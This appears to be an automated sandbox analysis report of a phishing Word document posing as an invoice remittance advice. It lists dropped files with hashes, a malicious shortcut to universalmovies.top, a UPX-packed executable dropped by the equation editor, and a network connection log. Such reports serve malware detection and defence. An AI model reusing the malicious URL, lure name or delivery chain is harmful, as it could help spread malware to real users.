                                          Preview:......M.eFy...z..T.B..@..1..m.S,...X.F...Fa.q..............................#&...G....j.............04..K....p........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Jun 24 15:22:51 2024, length=16429, window=hide
                                          Category:dropped
                                          Size (bytes):1299
                                          Entropy (8bit):4.600687427878988
                                          Encrypted:false
                                          SSDEEP:24:8TV/XT8z1bkwfOqG/sXFBGywRNeDnHMzSfQXFBGywPDv3qekwk7N:8TV/XTQ1bRtXrkwcwQXrfekwiN
                                          MD5:D3E2EBFEC7A252D93F2745683E6BDDDA
                                          SHA1:AC32E2FAE02F15E8964618AB7EE74A679EAA789C
                                          SHA-256:A86E34C2B81E24FD439E6BD436B48E0F4502F8E5A7F23F14D6F425E59C1101C2
                                          SHA-512:FE9182081DD29C6EFF9B0051B5702AE0C8ECF576A0BAB38DE8964F34F18DCC654218FC339D4BB18E3FAE2127A72CB15270AAA7AD9A7ED51BC2CA77045601AD4B
                                          Malicious:false
                                          Preview:L..................F.... ....~..r....~..r.....R...-@......................A....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X...user.8......QK.X.X.*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.-@...X. .INVOIC~1.DOC..........WD..WD.*.........................I.n.v.o.i.c.e. .L.G.M.S.C.H.0.0.4.0.9.2.4. .P.a.i.d. .-. .E.F.T. .R.e.m.i.t.t.a.n.c.e. .A.d.v.i.c.e. .a.n.d. .R.e.c.e.i.p.t...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc.^.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.v.o.i.c.e. .L.G.M.S.C.H.0.0.4.0.9.2.4. .P.a.i.d. .-. .E.F.T. .R.e.m.i.t.t.a.n.c.e. .A.d.v.i.c.e. .a.n.d. .R.e.c.e.i.
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Generic INItialization configuration [folders]
                                          Category:dropped
                                          Size (bytes):216
                                          Entropy (8bit):5.06358459018522
                                          Encrypted:false
                                          SSDEEP:6:M0C9yHAuod2zJerfp6gIKKJHAuod2zJerfpc:M0Ctd2zSfpR3Zd2zSfpc
                                          MD5:9BC21D7C7B1E3CC79D2C054D7E16C6EF
                                          SHA1:A96017DCFD05246C66F7C90CC3B054DEACF95C71
                                          SHA-256:0D54C3697FECF8BBD46F05027CDCDB158B4291BF6F59586E60ED67767B9B5619
                                          SHA-512:4DA0EFCC63D7225E98EA94CE52E1AF17817A2AEAC8E9CF2A1B2E83A1186EA03DD742B0E6DE63087951AA980FECA7F468F71170E1315808C86DAB03060FB93956
                                          Malicious:false
                                          Preview:[doc]..notorious.doc.url=0..Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.LNK=0..[folders]..universalmovies.top.url=0..Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.LNK=0..
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/notorious.doc>), ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):67
                                          Entropy (8bit):4.5151019223847335
                                          Encrypted:false
                                          SSDEEP:3:HRAbABGQYm2ftREJIKT+RK2jBdovn:HRYFVm4DgIKKs2bov
                                          MD5:50809E1406576FA2394FE42F56AA74EE
                                          SHA1:6A0718AB5D4FB7DD7707593FC041E55FCD6C3911
                                          SHA-256:4FB40098359D19B5CD9E39390AD7C2C88210BD035BC5E2ABB325BA198D174A89
                                          SHA-512:26694D2387B87B3068E96C99FBE9E6CB7CDD2BBE007BA411F9F48EC966C9A6F6B5CB98009C7360EBA29A0CF38229D0AE785A63AE88E654DA737A6EE143D7CF6C
                                          Malicious:true
                                          Preview:[InternetShortcut]..URL=https://universalmovies.top/notorious.doc..
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/>), ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):54
                                          Entropy (8bit):4.543296354659384
                                          Encrypted:false
                                          SSDEEP:3:HRAbABGQYm2ftREJIKT+yv:HRYFVm4DgIKKyv
                                          MD5:3C956186B2FF37FBFA333BDF67DDB8BD
                                          SHA1:728D4652328FCEE86DD0DDE155AAA55368CE02DA
                                          SHA-256:7B8479B5BE126F67DBD13A73A9210F43E60155F0AD59296F8E7870F69989214B
                                          SHA-512:386117368A28FEB1D83B8121057D59BE20D129AC9D2583EF3F22C1D56455CA186EA95333B4A3B0727A7E35855D8C75DD8FFE779B891213DFE55BEEAAFF65A800
                                          Malicious:true
                                          Preview:[InternetShortcut]..URL=https://universalmovies.top/..
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.4797606462020307
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                          Malicious:false
                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                          Category:dropped
                                          Size (bytes):644096
                                          Entropy (8bit):7.796206243772775
                                          Encrypted:false
                                          SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                          MD5:901A623DBCCAA22525373CD36195EE14
                                          SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                          SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                          SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.4797606462020307
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                          Malicious:false
                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                          File type:Microsoft Word 2007+
                                          Entropy (8bit):7.926773617204646
                                          TrID:
                                          • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                          • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                          • ZIP compressed archive (8000/1) 9.41%
                                          File name:Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc
                                          File size:16'429 bytes
                                          MD5:9edc82805ecc2d30f07d99973883c3c6
                                          SHA1:877fae637a454593a1b66bfede20356803833266
                                          SHA256:927e8668d7e5b22d0d278cb66ecbb15a51420f2fc5299aaa324d43a7d04719a2
                                          SHA512:b24ed91e3f53fe2cfc0b0fdaebcd495cbc878507187a802ed019736be707d5d832f149360dba0cfd394df5e0406bd979fda5aff4357fe4e2bede514098fc8cf3
                                          SSDEEP:384:tyXxo8qWds8PL8wi4OEwH8TIbE91r2fR3JYovij7XCnp:tcxIq5P3DOqnYJZ1vO7XCp
                                          TLSH:D072B0DDC48402AED30748F870022066FBFC9A67F9B29D1FB610B67844765CEDB40A9C
                                          File Content Preview:PK.........H.X...7U... .......[Content_Types].xmlUT....6yf.6yf.6yf...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B
                                          Icon Hash:2764a3aaaeb7bdbf
                                          Document Type:OpenXML
                                          Number of OLE Files:1
                                          Has Summary Info:
                                          Application Name:
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:False
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 24, 2024 18:22:55.111697912 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.111808062 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:55.111886978 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.118004084 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.118041992 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:55.637742996 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:55.637821913 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.642206907 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.642247915 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:55.642643929 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:55.642704964 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.718149900 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:55.760508060 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:56.055571079 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:56.055618048 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:56.055645943 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:56.055663109 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:56.055686951 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:56.055700064 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:56.060941935 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:56.060967922 CEST44349166104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:22:56.060980082 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:56.061012030 CEST49166443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:22:59.399122000 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.399215937 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:22:59.399290085 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.399821997 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.399854898 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:22:59.913821936 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:22:59.914120913 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.918049097 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.918082952 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:22:59.918534994 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:22:59.920576096 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:22:59.964533091 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:00.050872087 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:00.050956011 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:00.051176071 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:00.051619053 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:00.051659107 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:00.051707983 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:00.051723957 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:00.051768064 CEST49167443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:00.051779985 CEST44349167172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:05.961464882 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:05.961493969 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:05.961546898 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:05.962272882 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:05.962285995 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.574227095 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.574526072 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.627155066 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.627182007 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.627587080 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.649475098 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.696513891 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.975954056 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.976032019 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.976126909 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.979165077 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.979165077 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.979165077 CEST49168443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:06.979195118 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.979204893 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:06.979207993 CEST44349168172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.292856932 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.292951107 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.293032885 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.293395996 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.293433905 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.771518946 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.771621943 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.777884007 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.777937889 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.778286934 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:07.779723883 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:07.824510098 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:08.144215107 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:08.144328117 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:08.144412041 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:08.145109892 CEST49169443192.168.2.22172.67.162.95
                                          Jun 24, 2024 18:23:08.145133972 CEST44349169172.67.162.95192.168.2.22
                                          Jun 24, 2024 18:23:08.827466965 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:08.827508926 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:08.830581903 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:08.830581903 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:08.830610991 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.290662050 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.290745020 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.296472073 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.296494961 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.296854973 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.298605919 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.340506077 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.664311886 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.664413929 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.664494038 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.664597034 CEST49170443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.664645910 CEST44349170104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.713625908 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.713752985 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:09.713841915 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.714088917 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:09.714122057 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.193814039 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.195275068 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.196835041 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.196867943 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.198437929 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.198451996 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333609104 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333677053 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333709002 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333741903 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333774090 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333803892 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333834887 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.333911896 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.333911896 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.333911896 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.333960056 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.334007025 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.334028006 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.334068060 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.334110975 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.334127903 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.334177971 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.334191084 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.334238052 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.338468075 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.339282036 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.364950895 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.423949957 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424046040 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424087048 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424123049 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424153090 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424160957 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424197912 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424218893 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424218893 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424245119 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424252033 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424288034 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424293995 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424335003 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424500942 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424541950 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424612045 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424649954 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424664021 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424699068 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424707890 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424742937 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.424762964 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.424804926 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.425385952 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.425424099 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.425438881 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.425568104 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.425602913 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.425605059 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.425616026 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.425637960 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.425648928 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.426222086 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426300049 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426337004 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.426343918 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426383018 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.426402092 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426438093 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.426445961 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426481009 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.426489115 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.426526070 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.427212000 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.427253962 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.427294970 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.427331924 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.427396059 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.428792953 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.431276083 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.514997005 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515113115 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515151024 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515156031 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515182972 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515206099 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515228033 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515245914 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515265942 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515273094 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.515289068 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515315056 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515605927 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.515990019 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.516047955 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.516144037 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.516190052 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.516227961 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.516277075 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.517015934 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.517070055 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.517071009 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.517085075 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.517108917 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.517121077 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.517889977 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.517932892 CEST44349171104.21.74.191192.168.2.22
                                          Jun 24, 2024 18:23:10.517941952 CEST49171443192.168.2.22104.21.74.191
                                          Jun 24, 2024 18:23:10.517950058 CEST44349171104.21.74.191192.168.2.22
